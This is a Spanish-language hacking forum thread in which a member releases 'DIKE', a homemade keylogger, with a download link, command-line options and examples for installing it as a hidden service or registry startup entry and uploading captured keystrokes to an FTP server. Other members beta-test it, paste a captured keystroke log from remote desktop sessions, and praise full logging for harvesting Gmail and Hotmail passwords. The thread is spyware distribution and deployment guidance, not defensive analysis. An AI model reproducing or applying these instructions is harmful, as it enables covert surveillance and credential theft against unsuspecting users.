próximo »

[DarkIker]

DIKE es un acrónimo de DarkIker Is a Kiddie Empirical o DarkIker Keylogger( copyright flacman ), en si DIKE es un keylogger echo a medida bajo las especificaciones de varios miembros CUT. DIKE esta diseñado para ser configurado por linea de comandos proveiendo una rápida configuración en base a los parámetros especificados; el fichero de log generado es Unicode al igual que su logueo. La lista de parámetros se muestra a continuación:

n = Nombre del servicio o clave del registro ( string ).
s = Añadir como servicio para iniciarse con el pc.
t = Mover el ejecutable a la carpeta temporal y borrar en el reinicio( no combinable con 's' y 'S' ).
S = Añadir al registro para iniciarse con el pc( no combinable con 's' ).
l(ele) = Directorio en donde crear el archivo de logs( string ).
f = Activa la opción de subir los logs a un servidor FTP y especifica el servidor FTP( string ).
u = Nombre de Usuario del servidor FTP( string ).
p = Password del servidor FTP( string ).
T = Intervalo de tiempo( en segundos ) para subir los logs al servidor FTP( string ).

Las opciones marcadas con "( string )" al final indican que inmediatamente después de la opción se debe dejar un espacio y especificar el string que acompaña la opción, si el string contiene espacios debe especificarse entre comillas, el siguiente es un ejemplo de DIKE configurado para añadirse como un servicio, usando como nombre CUT, subiendo los logs al servidor FTP ftp.colombiaunderground.org con username Flacman y password "DIKE Mola":

X:\DIKE>DIKE sn CUT f ftp.colombiaunderground.org u Flacman p "DIKE Mola"

El siguiente ejemplo muestra configurando DIKE para que se añada como servicio, con nombre de servicio "Process Handler", seteando como directorio de logs "C:\Program Files\Ares", servidor ftp ftp.usuarios.lycos.es, username CUT, password 123456 e intervalo de subida 180 segundos.

X:\DIKE>DIKE sn "Process Handler" l "E:\Program Files\Ares" f ftp.usuarios.lycos.es p 123456 u CUT T 180

Llegado el caso que no se especifique ninguna opción, en la configuración o algunas sean "obviadas" las siguientes son las por defecto:

Nombre del Servicio/Clave del registro = ProcessSC.
Directorio de Logs = NULL( como programa en el mismo directorio, si es servicio en el directorio de sistema).
Servidor FTP = NULL( No activado por defecto ).
Intervalo de Subida de Logs = 120 Segs.
Nombre fichero de logs = Nombre PC + Día + Mes.

Esta es una versión Beta, sujeta a que ustedes la testeen en busca de errores y fallos, y por supuesto a comentarios y sugerencias, esta versión pesa 52 Kb debido a que es una beta, espero en la versión final no superar los 15 Kb. Bueno chau.

PD: Como casi me olvido el disclaimer si esta es una parte sumamente importante que es donde yo me lavo
las manos, así que aquí voy:

"Yo la persona representada bajo la figura hipotética de DarkIker y/o Iker, no
 me hago responsable por cualquier acción por parte de los usuarios de, este
 programa así como tampoco certifico que este funcione como e descrito a lo
 largo de este post. Cualquier acción legal o jurídica recaerá única y exclusivamente
 en el usuario del programa mas no en su creador representado en mi persona".

Download Link: http://www.colombiaunderground.org/Aportes_CUT/DIKE.exe

Att: DarkIker

[flacman]

mola, jeje falto el "hola viteh"

[nitr0k1ller]

Aguanta bastante, lo felicito

[Neullmann]

Buenas...

Pues primero congratulations. Parece que la whipiada de alluz sirvió... xD

Estuve probandolo... como lo quería utilizar solo una vez, es decir, no dejarlo en el registro ni habilitado para la próxima vez que se inicie el sistema, entonces no utilicé ninguna de la dos opciones "s" o "S".

Para el primer caso intenté con un servidor ftp de iespana

con algo como

Código:

DIKE n "jajaja" f algo.iespana.es u algo_5 p algo

pero no funciono (acá creo q sobra la opción n, verdad?)

luego probé con algo como

Código:

DIKE l "C:\algo" T 10

pero tampoco funcionó

Como características anormales en el funcionamiento del sistema detecté 3 inicialmente

1. Un ligero parpadeo en el cursor cada 6 segundos aprox.
2. Desactivó el uso de tildes. Mientras corría el DIKE.exe no puedo utilizar las tildes.
3. Desactivó el firewall.

Seguiré probando...

Son cosas que se corrigen el camino... 

Pd. Iker en su ejemplo para:

X:\DIKE>DIKE sn CUT f ftp.colombiaunderground.org u Flacman p "DIKE Mola"

CUT debería ir encerrado en comillas, verdad?

/quit

EDIT.

Una prueba más...

Código:

DIKE sn "jejeje" l "C:\algo"

Después de ello no sucede nada...

Bueno las tildes siguen sin funcionar... reinició y efectivamente el servicio se ejecuta automáticamente, no con el nombre jejeje sino con el nombre DIKE.exe. El problema es que sigue sin funcionar.

Después de reiniciar las tildes vuelven a funcionar... xD ah, el sistema no reinició normalmente, tocó a las malas...

El servicio si se genera como tal...



/quit

EDIT 2.

Efectivamente mientras el servicio está habilitado (instalado) no me dejaba reiniciar la máquina a las buenas... lo removí y voilà...

/quit

[DarkIker]

Dire lo que dicen siempre los programadores "en mi pc funcionaba", y es verdad, aca me funca el mendigo :S.

Att: DarkIker

[flacman]

pero viteh, estuve probando en Led y tmbn pasa lo mismo, ya arregle lo del FTP (ahora se lo mando) pero lo de la hookiada como tal si te tok viteh

[DarkIker]

Bueno aenas pueda emos por que a mi me funca bien y en un XP SP3 que acabe de probar tambien .

Att: DarkIker

[Alluz]

No se si estoy haciendo algo mal, pero no encuentro el archivo de logs!!!
PD. Uso Vista Ultimate.

[Alluz]

Je... tan tonto yo!!! no busqué como oculto. (attrib -h -r -s archivolog)

Problema identificado:
* No hace un hook con escritorios remotos ni con máquinas virtuales

Visualmente:
* El archivo de logs guarda todas las teclas!! incluido [Entrar] es un poco incomodo interpretarlo jeje.

[flacman]

Alluz es preferible que coja todas las teclas.... hummm voy a hacer una GUI interpretadora jeje mas bonito xD

-- edit --
No mentiras, ALLUZ! va a hacer la GUI en python! whipiad!

[DarkIker]

Ven como a  Alluz si le funca y en Vista Ultimate.
Si, Guarda todas las teclas por especifiacion del flaco, por que hpta vida uno se hace la "re chimba" de Keylogger con logueo inteligente y hasta le baña al perro y llega el flaco a decir "no sabe que mejor que no haga eso y mejor que haga esto asi y asa" ¬¬( toy puto de solo recordarlo xD ). Salu2.

PD: Ya casi ta CTrace listo para publicar .

Att: DarkIker

[flacman]

Es bueno que se loguee todo, al hacer un "análisis" de los movimientos de las personas (por ejemplo, entra a gmail (por cierto sale el banner q dice q está entrando a gmail), pone su usuario y contraseña, despues va a hotmail, pone su usuario y contraseña, despues vuelve a gmail, borra la contraseña actual y la cambia por otra, y pone enter), esto le sirve a uno para determinar muchas cosas en varias ocaciones muy especiales, por eso es bueno tener el 100% de la información.

por cierto, jeje como se arreglará el problema de TS?

[Alluz]

No agarra nada dentro de la sesion de terminarl server, incluso estando como servicio.

Código:

[ M A Y U S C U L A S   D E R E C H A ] 
 C o n e x i ó n   a   E s c r i t o r i o   r e m o t o 
 0 7 / 1 4 / 0 8   1 7 : 1 6 : 1 6 
 [ R E T R O C E S O ] [ R E T R O C E S O ] [ R E T R O C E S O ] 9 [ E N T R A R ] 
 
 A d v e r t e n c i a   d e   s e g u r i d a d   d e   c o n e x i ó n   a   E s c r i t o r i o   r e m o t o 
 0 7 / 1 4 / 0 8   1 7 : 1 6 : 2 0 
 [ E N T R A R ] 
 
 1 9 2 . 1 6 8 . 2 0 2 . 9   -   E s c r i t o r i o   r e m o t o 
 0 7 / 1 4 / 0 8   1 7 : 1 6 : 2 1 
 [ M A Y U S C U L A S   D E R E C H A ] [ M A Y U S C U L A S ] [ M A Y U S C U L A S ] 
 C o n e x i ó n   a   E s c r i t o r i o   r e m o t o 
 0 7 / 1 4 / 0 8   1 7 : 1 8 : 5 1 
 [ R E T R O C E S O ] 0 [ E N T R A R ] 
 
 A d v e r t e n c i a   d e   s e g u r i d a d   d e   c o n e x i ó n   a   E s c r i t o r i o   r e m o t o 
 0 7 / 1 4 / 0 8   1 7 : 1 8 : 5 2 
 [ E N T R A R ] 
 
 1 9 2 . 1 6 8 . 2 0 2 . 1 0   -   E s c r i t o r i o   r e m o t o 
 0 7 / 1 4 / 0 8   1 7 : 1 8 : 5 2 
 [ M A Y U S C U L A S   D E R E C H A ] 
 1 9 2 . 1 6 8 . 2 0 2 . 9   -   E s c r i t o r i o   r e m o t o 
 0 7 / 1 4 / 0 8   1 7 : 1 9 : 4 3 
 
 C o n e x i ó n   a   E s c r i t o r i o   r e m o t o 
 0 7 / 1 4 / 0 8   1 7 : 2 0 : 1 0 
 [ R E T R O C E S O ] 1 [ E N T R A R ] 
 
 A d v e r t e n c i a   d e   s e g u r i d a d   d e   c o n e x i ó n   a   E s c r i t o r i o   r e m o t o 
 0 7 / 1 4 / 0 8   1 7 : 2 0 : 1 1 
 [ E N T R A R ] 
 
 1 9 2 . 1 6 8 . 2 0 2 . 1 1   -   E s c r i t o r i o   r e m o t o 
 0 7 / 1 4 / 0 8   1 7 : 2 0 : 1 2 
 [ M A Y U S C U L A S   D E R E C H A ] 
 q u i m b a y a t s 1   -   E s c r i t o r i o   r e m o t o 
 0 7 / 1 4 / 0 8   1 7 : 2 2 : 2 8 
 
 C o n e x i ó n   a   E s c r i t o r i o   r e m o t o 
 0 7 / 1 4 / 0 8   1 7 : 2 2 : 3 9 
 f r o m 
 q u i m b a y a t s 1   -   E s c r i t o r i o   r e m o t o 
 0 7 / 1 4 / 0 8   1 7 : 2 2 : 3 9 
 [ M A Y U S C U L A S   D E R E C H A ] [ M A Y U S C U L A S   D E R E C H A ] [ M A Y U S C U L A S   D E R E C H A ] [ M A Y U S C U L A S   D E R E C H A ] [ M A Y U S C U L A S   D E R E C H A ] [ M A Y U S C U L A S   D E R E C H A ] [ M A Y U S C U L A S   D E R E C H A ] [ M A Y U S C U L A S   D E R E C H A ] [ M A Y U S C U L A S   D E R E C H A ] [ M A Y U S C U L A S   D E R E C H A ] [ M A Y U S C U L A S   D E R E C H A ] [ M A Y U S C U L A S   D E R E C H A ] [ C T R L ] [ M A Y U S C U L A S ] [ M A Y U S C U L A S ] [ M A Y U S C U L A S ] [ M A Y U S C U L A S ] [ C T R L ] [ M A Y U S C U L A S ] [ M A Y U S C U L A S   D E R E C H A ] [ M A Y U S C U L A S ] [ M A Y U S C U L A S ] [ M A Y U S C U L A S ]

[flacman]

y si instala el servicio no en su computador sino en el servidor TS?

[Alluz]

No se si funque.. pero check algo para terminarl server:
http://www.freelists.org/archives/program-l/08-2006/msg00016.html